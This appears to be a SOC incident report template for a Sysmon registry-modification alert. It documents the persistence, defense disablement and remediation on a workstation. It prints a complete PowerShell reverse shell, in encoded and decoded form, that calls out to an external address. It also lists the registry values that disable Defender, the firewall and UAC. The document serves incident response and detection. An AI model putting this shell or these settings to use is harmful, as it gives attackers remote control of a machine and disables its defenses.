Sysmon Alert Details
Alert ID: SYSMON-REG-MOD-1112-7842 Alert Time: 2024-03-07 14:15:33 EST Severity: HIGH (85/100) Source: Sysmon (Event ID 13 – Registry Value Set) Rule: “Suspicious Registry Modification – Run Key” MITRE ATT&CK: T1112 – Modify Registry
Alert Details:
Detection: Multiple registry modifications for persistence and configuration changes
Host: ENG-WS-045 (Engineering Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 14:00-14:15 EST
Registry Modifications (Event ID 13):
Persistence – Run Key:
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “WindowsUpdate”
Data: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==”
Time: 14:05:22
Disable Security Tools:
Key: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
Value: “1” (enabled)
Time: 14:06:45
Disable Firewall:
Key: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall
Value: “0” (disabled)
Time: 14:07:18
Disable UAC:
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Value: “0” (disabled)
Time: 14:08:33
Add Exclusion for Malware Path:
Key: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Value: “C:\Windows\Temp”
Data: “0”
Time: 14:09:45
Process Details:
Process: C:\Users\alexchen\Downloads\system_update.exe (PID: 4789)
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Parent: explorer.exe
User: alexchen
Detection Logic:
Multiple registry modifications in short time
Persistence via Run key (encoded PowerShell)
Security tools disabled (Defender, Firewall, UAC)
Exclusions added for malware paths
Pattern matches attacker securing environment
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed malicious registry modifications
2. Process Investigation
Identify system_update.exe
CrowdStrike Falcon
Malicious tool downloaded from internet
3. Immediate Action
Revert registry changes
PowerShell, reg
All registry keys restored to original values
4. Security Tools Restart
Re-enable Defender, Firewall, UAC
PowerShell
Security services restarted
5. Process Termination
Kill system_update.exe
CrowdStrike
Process terminated
6. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-182 Summary: T1112 – Registry Modifications for Persistence and Defense Disablement Status: RESOLVED Resolution: MALICIOUS – Registry Restored Priority: P2 – MEDIUM Labels: T1112, modify-registry, persistence, defense-evasion, sysmon Components: Endpoint-Security, Registry-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 13 (Registry Value Set).
Alert: “Suspicious Registry Modification – Run Key”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: C:\Users\alexchen\Downloads\system_update.exe.
Time: 2024-03-07 14:15 EST.
Technique: MITRE ATT&CK T1112 – Modify Registry.
2. Technical Analysis:
Attack Chain:
13:30 – User downloads “system update tool” from pop-up ad
13:45 – Executes system_update.exe
13:50 – Malware begins registry modifications
14:00-14:15 – Multiple registry changes
14:15 – Sysmon detects
Registry Modifications:
Run Key Persistence: Encoded PowerShell reverse shell (every logon)
Disable Defender: Turns off antivirus protection
Disable Firewall: Opens network for C2
Disable UAC: Allows elevated actions without prompts
Add Exclusion: Prevents Defender from scanning Temp folder (where malware lives)
Encoded PowerShell (decoded):
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.34.56’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Impact:
Persistence established
Security defenses disabled
Malware could operate freely
3. Investigation Findings:
Timeline:
13:30 – Tool downloaded
13:45 – Executed
13:50-14:15 – Registry modifications
14:15 – Alert
14:17 – SOC investigates
14:18 – Registry restored
14:19 – Security tools re-enabled
14:20 – Process terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\system_update.exe (SHA256: b2c3d4e5…)
Registry Changes:
– HKLM\…\Run\WindowsUpdate (malicious)
– HKLM\…\Windows Defender\DisableAntiSpyware = 1
– HKLM\…\EnableFirewall = 0
– HKLM\…\EnableLUA = 0
– HKLM\…\Exclusions\Paths\C:\Windows\Temp
4. Containment Actions:
Immediate Actions:
Restored all registry keys to original values.
Re-enabled Windows Defender.
Re-enabled Windows Firewall.
Re-enabled UAC.
Removed exclusion for Temp folder.
Terminated system_update.exe.
Isolated host.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed fake update tool.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Data Exposure: None (C2 not yet active).
7. Remediation & Prevention:
Completed Actions:
Registry restored.
Security tools re-enabled.
Malware removed.
Technical Controls Enhanced:
Created alert for registry modifications to Run keys.
Enhanced monitoring for security tool disablement.
Implemented application control.
8. Conclusion:
An attacker used a fake update tool to modify registry keys for persistence and disable security defenses. Sysmon detected the registry changes, enabling rapid restoration before C2 communication.
Closure Rationale: Registry restored; security tools re-enabled; malware removed.
Analyst: [Your Name], SOC Analyst Date: 2024-03-07 15:30 EST